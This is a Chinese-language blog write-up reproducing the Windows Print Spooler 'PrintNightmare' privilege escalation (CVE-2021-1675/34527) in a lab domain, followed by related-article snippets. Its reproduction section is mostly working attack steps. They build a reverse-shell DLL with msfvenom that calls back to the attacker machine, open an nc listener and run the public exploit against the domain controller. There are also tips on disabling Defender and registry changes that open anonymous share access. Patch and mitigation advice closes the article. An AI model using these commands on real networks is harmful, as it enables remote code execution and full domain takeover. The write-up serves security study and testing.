<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CVE-2021-1675/34527:Windows Print Spooler權限提升復現

    VSole2021-08-05 05:36:06

    0x01 簡介

    Windows Print Spooler是Windows的打印機后臺處理程序,廣泛的應用于各種內網中。

    0x02 漏洞概述

    攻擊者可以通過該漏洞繞過PfcAddPrinterDriver的安全驗證,并在打印服務器中安裝惡意的驅動程序,若攻擊者所控制的用戶在域中,則攻擊者可以連接到DC中的Spooler服務,并利用該漏洞在DC中安裝惡意的驅動程序,完整的控制整個域環境。

    0x03 影響版本

    * Windows Server 2019 (Server Core installation)  
    * Windows Server 2012 R2 (Server Core installation)
    * Windows Server 2012 R2
    * Windows Server 2012 (Server Core installation)
    * Windows Server 2012
    * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
    * Windows RT 8.1
    * Windows 8.1 for x64-based systems
    * Windows 8.1 for 32-bit systems
    * Windows 7 for x64-based Systems Service Pack 1
    * Windows 7 for 32-bit Systems Service Pack 1
    * Windows 10 Version 1607 for x64-based Systems
    * Windows 10 Version 1607 for 32-bit Systems
    

    0x04 環境搭建

    目標域:

    Windows Server 2019域環境 ( test.com )

    IP:192.168.3.3

    攻擊機:Kali-2021

    IP:192.168.3.55

    普通域賬戶密碼:

    win10/windows10>

    impact包:

    https://github.com/cube0x0/impacket

    Linux配置smb匿名訪問:

    1、修改/etc/samba/smb.conf文件

    [global]
        map to guest = Bad User
        server role = standalone server
        usershare allow guests = yes
        idmap config * : backend = tdb
        smb ports = 445
    [smb]
        comment = Samba
        path = /usr/share2    
        guest ok = yes
        read only = no
        browsable = yes
    

    PS:

    對于 [global] 只需要把 idmap config * : backend = tdb 前面的分號刪掉,然后再添加一條 smb ports = 445  即可,其他項都是默認的,最后把整個 [smb]  添加上去

    2、重啟samba

    service smbd restart
    

    3、創建共享文件夾

    mkdir /usr/share2
    

    Windows配置匿名訪問:

    mkdir C:\share
    icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
    icacls C:\share\ /T /grant Everyone:r
    New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'(powershell下運行不適合win7)
    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
    

    0x05 漏洞復現

    1、安裝impact包

    git clone https://github.com/cube0x0/impacket
    cd impacket
    python3 ./setup.py install
    

    2、Kali生成惡意dll文件

    msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.3.55 LPORT=4444 -f dll -o /usr/share2/shell.dll
    

    3、msf或者nc開啟監聽

    msf 和 nc開啟監聽都可以 
    nc -lnvp 4444
    


    4、執行exp

    exp地址:https://github.com/cube0x0/CVE-2021-1675
    python3 CVE-2021-1675.py test.com/win10:"windows10>?"@192.168.3.3 '\\192.168.3.55\smb\shell.dll'
    

    雖然報錯了 但是已經收到了shell



    0x06 修復建議

    1.官方建議:

    目前官方已發布漏洞修復補丁,建議受影響用戶盡快更新漏洞補丁。

    https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675
    

    2. 臨時防護措施:

    若相關用戶暫時無法進行補丁更新,可通過禁用Print Spooler服務來進行緩解:

    1)在服務應用(services.msc)中找到Print Spooler服務。

    2)停止運行服務,同時將“啟動類型”修改為“禁用”。

    **坑點**

    1、windows defender 關閉

    defender沒關閉之前,exp一直失敗,然后就嘗試關閉defender,就可以成功(dll未免殺的原因)。

    2、windows共享利用失敗

    在windows上測試開啟共享之后,能夠在域控上匿名訪問到共享文件,但是exp一直失敗。

    參考鏈接:

    https://github.com/cube0x0/CVE-2021-1675

    smb
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    SMB Beacon 與命名管道在 Windows 中,無管理員權限的情況下,即無法添加白名單。定義特定版本的協議的消息數據包集稱為方言。進行身份驗證后,用戶可以訪問服務器上不受共享級別安全性保護的所有共享。
    微軟SMB和空會話介紹?
    2022-06-06 07:06:54
    空會話意味著對網絡資源的訪問是在沒有身份驗證的情況下授予的。也稱為匿名或訪客訪問,最常見的是IPC$ "Windows Named Pipe"共享。人們傾向于認為用戶名是唯一的身份驗證機制,在工作組中,這基本上是正確的。
    Windows SMB Server遠程代碼執行漏洞(CNVD-2017-29681)
    思科透露其四個小型企業路由器系列存在嚴重缺陷——僅在 2022 年第二次。
    0x01 前言之前在打一個域環境的時候出現了域內主機不出網的情況,當時用的是cs的socks代理將不出網主機的流量代理到了邊緣主機上。當時沒有考慮太多,下來之后想到搭一個環境復現一下當時的情況,看有沒有更簡便的方法能夠打下不出網的主機
    攻擊者可通過向共享目錄投遞連接外部服務器的資源文件,用戶請求過程中嘗試身份驗證,會默認使用SMB協議將用戶哈希發送到服務器,這樣攻擊者就會獲取對方用戶賬戶哈希。
    服務器信息塊(Server Message Block,SMB
    未經身份驗證的遠程攻擊者可能會利用這些漏洞,以易受攻擊的設備為根執行任意代碼。“Cisco Small Business RV160,RV160W,RV260,RV260P和RV260W VPN路由器的基于Web的管理界面中的多個漏洞可能允許未經身份驗證的遠程攻擊者以root用戶的身份在受影響的設備上執行任意代碼。”這些漏洞之所以存在,是因為未正確驗證HTTP請求。好消息是,思科產品安全事件響應團隊沒有意識到利用上述漏洞進行的攻擊。
    上周四(1月11日),國家網絡安全中心(NCSC)發布了一份面向中小企業(SMB)的新指南,旨在幫助中小企業在使用在線服務時減少網絡攻擊的潛在影響。
    微軟宣布,為了提高Windows的安全性,此后在Windows 11 Insider Preview Build 25381企業版中,默認所有連接都需要SMB簽名。SMB簽名可以確保每條消息都包含使用會話密鑰和密碼套件生成的簽名。微軟官網上說,所有版本的Windows和Windows Server都支持SMB簽名,但第三方可能會對它禁用或不支持。不支持簽名的SMB設備允許惡意方進行攔截和中繼攻擊。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类